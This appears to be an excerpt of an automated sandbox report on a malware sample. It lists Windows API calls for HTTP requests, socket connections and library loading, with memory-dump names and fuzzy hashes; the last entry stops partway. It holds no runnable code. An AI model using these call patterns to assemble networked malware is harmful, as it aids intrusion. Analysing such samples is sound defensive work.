                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(00A1C398,00000001,00000000,00000000,00000000), ref: 00A1293C
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,00A1C3D2,00A1C3D1,00000003,00000000,00000000), ref: 00A1296C
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,GET,00A1C3D8,1.1,00000000,00000000,80800000,00000000), ref: 00A1299D
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00A129C0
                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A129E8
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A12A0E
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Accept: */*,00000000,00000000), ref: 00A12A1C
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,Accept: */*,00000000), ref: 00A12A2B
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 00A12A73
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A12AAF
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00A12ACB
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00A12AD5
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00A12ADF
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                          • String ID: 1.1$Accept: */*$GET$https://%s
                                                                                                                                                                                                                                                          • API String ID: 2082764430-47765423
                                                                                                                                                                                                                                                          • Opcode ID: 85ce036f8481fcda6dacc2d42c4c9635b80e5b56307842d54d4d834ce05055f4
                                                                                                                                                                                                                                                          • Instruction ID: b2a66fd35f66e3a978347546b9bae6538bd1d86e6948fcfc61947882c87f1fa3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85ce036f8481fcda6dacc2d42c4c9635b80e5b56307842d54d4d834ce05055f4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75510A75980218AFDB24CF94DC89BEEB7B4BF48710F108588F615A7280D7B4AAD5CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 00A135F4
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 00A1362D
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00A13651
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00A13673
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A1369C
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00A136DD
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00A1371F
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,-00000001), ref: 00A1380C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.dll), ref: 00A1381E
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 00A1383C
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A138B3
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A138C7
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00A138D4
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                                                                                                          • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                          • Opcode ID: 14264c2d38cd7c6edf0196bdea6e63ca84a883b79cf8676fba36585ae697e2c3
                                                                                                                                                                                                                                                          • Instruction ID: df88fb40c1012d1645746fe1ccf60a79a2a342d04c44cc7e7efada1e8f97f425
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14264c2d38cd7c6edf0196bdea6e63ca84a883b79cf8676fba36585ae697e2c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88815BB6E40228EBDB20DFA4DD89BD9B7B9AB58304F1041C8F209A7281D7749BC5CF55
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A12B72
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A12B93
                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 00A12BB0
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A12C08
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A12C48
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 00A12C97
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 00A12D35
                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,gzip), ref: 00A12D4B
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A12DC8
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00A12DD2
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A12DDA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 00A12B32
                                                                                                                                                                                                                                                          • gzip, xrefs: 00A12D3F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                          • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                          • Opcode ID: f2418793166607cad739a55e60daf00a95c0dd692bc2229467e655e0244c68e7
                                                                                                                                                                                                                                                          • Instruction ID: f7378a1acbc723be536baa80ecb34a6b8120a6aaf7e352f13ee2fa902a98420f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2418793166607cad739a55e60daf00a95c0dd692bc2229467e655e0244c68e7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84912AB594421CEBDB24CFA4DC48BEEB7B9BB48300F108199F509AB280DB759AC5CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00567952
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 00568FFA
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 0056900C
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 0056901E
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 00569030
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 00569042
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 00569054
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 00569066
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 00569078
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 0056908A
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 0056909C
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 005690AE
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 005690C0
                                                                                                                                                                                                                                                            • Part of subcall function 00568FDD: _free.LIBCMT ref: 005690D2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00567947
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: HeapFree.KERNEL32(00000000,00000000,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1), ref: 005673D2
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: GetLastError.KERNEL32(005662C1,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1,005662C1), ref: 005673E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00567969
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056797E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00567989
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005679AB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005679BE
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005679CC
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005679D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00567A0F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00567A16
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00567A33
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00567A4B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: e20e8ee1b2595f2696822d9a08c3b779fae3c1ebbab71136bc9a9b478286cbf3
                                                                                                                                                                                                                                                          • Instruction ID: ce54b4822138af6bef43ee2222c044fca321de5a06fdc37da4b67b7ce1d32a37
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e20e8ee1b2595f2696822d9a08c3b779fae3c1ebbab71136bc9a9b478286cbf3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF317E3160820A9FEB30AA78DC49B5B7FE9FF58718F14491DE858D7251DE30AD80DB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00566904
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: HeapFree.KERNEL32(00000000,00000000,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1), ref: 005673D2
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: GetLastError.KERNEL32(005662C1,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1,005662C1), ref: 005673E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00566910
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056691B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00566926
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00566931
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056693C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00566947
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00566952
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056695D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056696B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID: HuX
                                                                                                                                                                                                                                                          • API String ID: 776569668-3056619807
                                                                                                                                                                                                                                                          • Opcode ID: 4e863dae23bc4209c9273dc7b7c449015d94b2d2a1d0f5ea12426bcd40193307
                                                                                                                                                                                                                                                          • Instruction ID: 06654084b61308d1b43e8ee6f1e5abe0ae8734fda0ba518cb82bdb3581f086fb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e863dae23bc4209c9273dc7b7c449015d94b2d2a1d0f5ea12426bcd40193307
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11D47620400DAFCB11EF94CD46CDD3FA5FF58754B0146A8FE188B322DA31EA50AB94
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0056E486,?,00000000,?,00000000,00000000), ref: 0056DD53
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0056DDCE
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0056DDE9
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0056DE0F
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,0056E486,00000000,?,?,?,?,?,?,?,?,?,0056E486,?), ref: 0056DE2E
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,0056E486,00000000,?,?,?,?,?,?,?,?,?,0056E486,?), ref: 0056DE67
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                          • Opcode ID: 6729b0583314556906f9dbf308eddf5b86f98777605491ee855dfa1e7dfc21fa
                                                                                                                                                                                                                                                          • Instruction ID: 72773b0c615dd8fb2fd6135548b48cfff0447edc8dea7915c47a51dbda52d73d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6729b0583314556906f9dbf308eddf5b86f98777605491ee855dfa1e7dfc21fa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26518F71E002099FDB10CFA8D885AEEBFB8FF59310F14491AE956E7291E731A945CB70
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00A1A09C
                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 00A1A0C0
                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 00A1A0CD
                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 00A1A121
                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 00A1A13E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                          • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                          • Instruction ID: 388beb47b9edbf4f68bee7a9e1322824e560f787095b69f8b16a2c81896a0418
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15317C70A01219EBDB10EFA4C945BFEB7B6BF18310F108649F5216B2C0D3B49984CBA2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00569144: _free.LIBCMT ref: 0056916D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005691CE
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: HeapFree.KERNEL32(00000000,00000000,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1), ref: 005673D2
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: GetLastError.KERNEL32(005662C1,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1,005662C1), ref: 005673E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005691D9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005691E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00569238
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00569243
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056924E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00569259
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 393e60a867e19aeb7879eb30fd13b120711b756b36f91979827bf2db5a404af5
                                                                                                                                                                                                                                                          • Instruction ID: 9e90149800a91dc5d514541d533d14a924c928eabd145e4ff35b644b9d26ee7a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 393e60a867e19aeb7879eb30fd13b120711b756b36f91979827bf2db5a404af5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF1130B1544B4AA6D630BBB0CC0FFCB7FDC7F89B00F400E19B69967192D675B5049650
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                          • Opcode ID: 2cae8d0bf36dc0bb9d3ae448b3bd246f9f77a51f09fb9e61eb00c954a7e88801
                                                                                                                                                                                                                                                          • Instruction ID: eb8e0cbbf2353b9113fc15de540906c2c0f3d0fb45b4afdda65169460c69e9d0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cae8d0bf36dc0bb9d3ae448b3bd246f9f77a51f09fb9e61eb00c954a7e88801
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F02D36204602ABC631B775BC1DA1B2F55BBE6765F248514F918B3391EE208C45A130
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00567439,00000000,00000000,00000000,00000000,?,00567636,00000006,FlsSetValue), ref: 005674C4
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00567439,00000000,00000000,00000000,00000000,?,00567636,00000006,FlsSetValue,00586FB8,FlsSetValue,00000000,00000364,?,00566AB6), ref: 005674D0
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00567439,00000000,00000000,00000000,00000000,?,00567636,00000006,FlsSetValue,00586FB8,FlsSetValue,00000000), ref: 005674DE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: -^V
                                                                                                                                                                                                                                                          • API String ID: 3177248105-1776584890
                                                                                                                                                                                                                                                          • Opcode ID: 2e27db3eb208c50561746486d4cfb2ed0cb075c623ad2f8ba579b9dce3603a47
                                                                                                                                                                                                                                                          • Instruction ID: 83cb7db80d7fada55daf9659cb3d162a5d84e3dcbb5bf7ead0ad7199bd3f69e9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e27db3eb208c50561746486d4cfb2ed0cb075c623ad2f8ba579b9dce3603a47
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC01AC3261922A9BCB314A79AC4CD567F98FF6DB66B104520F90BD7240DB24D845D6F0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005689A6,00000003,?,00568946,00000003,0058D508,0000000C,00568A59,00000003,00000002), ref: 005689D1
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005689E4
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,005689A6,00000003,?,00568946,00000003,0058D508,0000000C,00568A59,00000003,00000002,00000000), ref: 00568A07
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
